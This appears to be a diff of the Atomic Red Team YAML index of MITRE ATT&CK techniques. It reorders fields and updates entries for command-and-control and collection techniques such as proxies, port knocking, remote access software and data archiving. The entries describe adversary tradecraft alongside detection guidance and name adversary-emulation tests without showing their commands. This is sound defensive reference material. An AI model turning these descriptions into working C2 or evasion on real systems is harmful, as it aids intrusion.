+ of compromise based on malware command and control signatures and infrastructure.
+ Relating subsequent actions that may result from Discovery of the system and
+ network information or Lateral Movement to the originating process may also
+ yield useful data.
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1090.003:
technique:
@@ -44873,21 +46351,21 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-14T23:23:41.770Z'
created: '2020-03-14T23:23:41.770Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network protocol analysis
- - Netflow/Enclave netflow
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: When observing use of Multi-hop proxies, network data from
the actual command and control servers could allow correlating incoming and
outgoing flows to trace malicious traffic back to its source. Multi-hop proxies
can also be detected by alerting on traffic to known anonymity networks (such
as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure
that uses this technique.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1026:
technique:
@@ -44914,13 +46392,13 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-30T13:59:11.272Z'
created: '2017-05-31T21:30:32.259Z'
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Packet capture
- - Netflow/Enclave netflow
- - Process use of network
- - Malware reverse engineering
- - Process monitoring
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
@@ -44928,13 +46406,13 @@ command-and-control:
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2) Correlating alerts between multiple
communication channels can further help identify command-and-control behavior.'
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ - Process use of network
+ - Malware reverse engineering
+ - Process monitoring
+ x_mitre_version: '1.0'
atomic_tests: []
T1095:
technique:
@@ -44969,9 +46447,18 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-11T15:09:26.624Z'
created: '2017-05-31T21:31:10.728Z'
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Ryan Becwar
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_network_requirements: true
+ x_mitre_detection: |-
+ Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.
+
+ Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
+
+ Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.
x_mitre_data_sources:
- Host network interface
- Netflow/Enclave netflow
@@ -44979,18 +46466,9 @@ command-and-control:
- Network protocol analysis
- Packet capture
- Process use of network
- x_mitre_detection: |-
- Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.
-
- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
-
- Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Ryan Becwar
+ x_mitre_version: '2.0'
identifier: T1095
atomic_tests:
- name: ICMP C2
@@ -45109,25 +46587,25 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-14T23:39:50.117Z'
created: '2020-03-14T23:39:50.117Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1571:
technique:
@@ -45165,23 +46643,23 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-26T22:02:25.221Z'
created: '2020-03-14T18:18:32.443Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - Process use of network
- - Netflow/Enclave netflow
- - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process use of network
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1571
atomic_tests:
- name: Testing usage of uncommonly used port with PowerShell
@@ -45252,16 +46730,10 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-26T23:26:10.109Z'
created: '2020-03-14T22:45:52.963Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Host network interface
- - Netflow/Enclave netflow
- - Network protocol analysis
- - Packet capture
- - SSL/TLS inspection
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
@@ -45269,17 +46741,23 @@ command-and-control:
will require SSL/TLS inspection if data is encrypted. Analyze network data
for uncommon data flows. User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Host network interface
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ - SSL/TLS inspection
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
- T1545.001:
+ T1205.001:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1545.001
- url: https://attack.mitre.org/techniques/T1545/001
+ external_id: T1205.001
+ url: https://attack.mitre.org/techniques/T1205/001
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
@@ -45294,7 +46772,7 @@ command-and-control:
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c
+ id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -45303,22 +46781,21 @@ command-and-control:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-01-22T20:26:58.120Z'
- created: '2020-01-22T20:26:58.120Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ modified: '2020-07-01T18:23:25.002Z'
+ created: '2020-07-01T18:23:25.002Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Record network packets sent to and from the system, looking
+ for extraneous packets that do not belong to established flows.
x_mitre_data_sources:
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: Record network packets sent to and from the system, looking
- for extraneous packets that do not belong to established flows.
- x_mitre_defense_bypassed:
- - Defensive network service scanning
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1001.003:
technique:
@@ -45349,23 +46826,23 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-15T00:40:27.503Z'
created: '2020-03-15T00:40:27.503Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
atomic_tests: []
T1572:
technique:
@@ -45415,16 +46892,8 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-27T17:15:35.372Z'
created: '2020-03-15T16:03:39.082Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network protocol analysis
- - Process monitoring
- - Process use of network
- - Netflow/Enclave netflow
- - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: "Monitoring for systems listening and/or establishing external
connections using ports/protocols commonly associated with tunneling, such
as SSH (port 22). Also monitor for processes commonly associated with tunneling,
@@ -45436,13 +46905,26 @@ command-and-control:
expected protocol standards regarding syntax, structure, or any other variable
adversaries could leverage to conceal data.(Citation: University of Birmingham
C2)"
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Process monitoring
+ - Process use of network
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1090:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Proxy
+ description: |-
+ Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
+
+ Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
external_references:
- source_name: mitre-attack
external_id: T1090
@@ -45455,18 +46937,13 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- description: |-
- Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
-
- Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
- name: Proxy
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T17:50:37.638Z'
+ modified: '2020-06-20T20:53:20.670Z'
created: '2017-05-31T21:31:08.479Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -45495,7 +46972,7 @@ command-and-control:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Remote Access Software
description: |-
- An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+ An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
@@ -45522,30 +46999,30 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T18:01:17.681Z'
+ modified: '2020-06-20T20:42:37.320Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Matt Kelly, @breakersall
- x_mitre_data_sources:
- - Network intrusion detection system
- - Network protocol analysis
- - Process use of network
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_permissions_required:
+ - User
+ x_mitre_network_requirements: true
x_mitre_detection: |-
Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.
[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.
- x_mitre_network_requirements: true
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Network intrusion detection system
+ - Network protocol analysis
+ - Process use of network
+ - Process monitoring
+ x_mitre_contributors:
+ - Matt Kelly, @breakersall
+ x_mitre_version: '2.0'
identifier: T1219
atomic_tests:
- name: TeamViewer Files Detected Test on Windows
@@ -45645,25 +47122,25 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-14T23:36:52.095Z'
created: '2020-03-14T23:36:52.095Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1132.001
atomic_tests:
- name: Base64 Encoded data.
@@ -45716,23 +47193,23 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-15T00:37:58.963Z'
created: '2020-03-15T00:37:58.963Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1573.001:
technique:
@@ -45760,10 +47237,12 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-26T21:25:37.306Z'
created: '2020-03-16T15:45:17.032Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.
+
+ In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
x_mitre_data_sources:
- SSL/TLS inspection
- Process monitoring
@@ -45771,34 +47250,33 @@ command-and-control:
- Malware reverse engineering
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: |-
- With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.
-
- In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
atomic_tests: []
- T1545:
+ T1205:
technique:
+ revoked: false
+ id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Traffic Signaling
+ description: |-
+ Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
+
+ Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
+
+ The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
external_references:
- source_name: mitre-attack
- external_id: T1545
- url: https://attack.mitre.org/techniques/T1545
+ external_id: T1205
+ url: https://attack.mitre.org/techniques/T1205
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Traffic Signaling
- description: |-
- Adversaries may use traffic signaling to hide open ports used for persistence or command and control. Traffic signaling is a well-established method used by both defenders and adversaries to hide open ports from access/discovery. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1545/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
-
- This technique has been observed for both the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
-
- The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -45807,24 +47285,26 @@ command-and-control:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T20:14:07.431Z'
- created: '2020-01-22T20:18:16.952Z'
+ modified: '2020-07-01T18:27:41.755Z'
+ created: '2018-04-18T17:59:24.739Z'
+ x_mitre_contributors:
+ - Josh Day, Gigamon
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
x_mitre_platforms:
- Linux
- macOS
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Packet capture
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_permissions_required:
- - User
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Josh Day, Gigamon
atomic_tests: []
T1071.001:
technique:
@@ -45856,8 +47336,16 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-26T20:15:35.821Z'
created: '2020-03-15T16:13:46.151Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Process monitoring
+ - Process use of network
+ - Netflow/Enclave netflow
+ - Packet capture
x_mitre_detection: "Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
@@ -45866,16 +47354,8 @@ command-and-control:
syntax, structure, or any other variable adversaries could leverage to conceal
data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from
known-bad or suspicious domains. "
- x_mitre_data_sources:
- - Network protocol analysis
- - Process monitoring
- - Process use of network
- - Netflow/Enclave netflow
- - Packet capture
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1071.001
atomic_tests:
- name: Malicious User Agents - Powershell
@@ -45940,8 +47420,19 @@ command-and-control:
name: sh
T1102:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:31:13.915Z'
+ modified: '2020-03-26T23:26:10.297Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Web Service
+ description: |-
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+
+ Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
external_references:
- source_name: mitre-attack
external_id: T1102
@@ -45950,19 +47441,8 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
-
- Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
- name: Web Service
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-26T23:26:10.297Z'
- created: '2017-05-31T21:31:13.915Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_platforms:
- Linux
- macOS
@@ -45991,6 +47471,21 @@ command-and-control:
collection:
T1560:
technique:
+ created: '2020-02-20T20:53:45.725Z'
+ modified: '2020-03-29T18:27:31.040Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a
+ description: |-
+ An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
+
+ Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
+ name: Archive Collected Data
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1560
@@ -45999,21 +47494,6 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Archive Collected Data
- description: |-
- An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
-
- Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
- id: attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-29T18:27:31.040Z'
- created: '2020-02-20T20:53:45.725Z'
x_mitre_platforms:
- Linux
- macOS
@@ -46059,6 +47539,23 @@ collection:
cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore'
T1560.003:
technique:
+ created: '2020-02-20T21:09:55.995Z'
+ modified: '2020-03-25T22:48:14.605Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b
+ description: 'An adversary may compress or encrypt data that is collected prior
+ to exfiltration using a custom method. Adversaries may choose to use custom
+ archival methods, such as encryption with XOR or stream ciphers implemented
+ with no external library or utility references. Custom implementations of
+ well-known compression algorithms have also been used.(Citation: ESET Sednit
+ Part 2)'
+ name: Archive via Custom Method
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1560.003
@@ -46067,23 +47564,6 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Archive via Custom Method
- description: 'An adversary may compress or encrypt data that is collected prior
- to exfiltration using a custom method. Adversaries may choose to use custom
- archival methods, such as encryption with XOR or stream ciphers implemented
- with no external library or utility references. Custom implementations of
- well-known compression algorithms have also been used.(Citation: ESET Sednit
- Part 2)'
- id: attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b
- type: attack-pattern
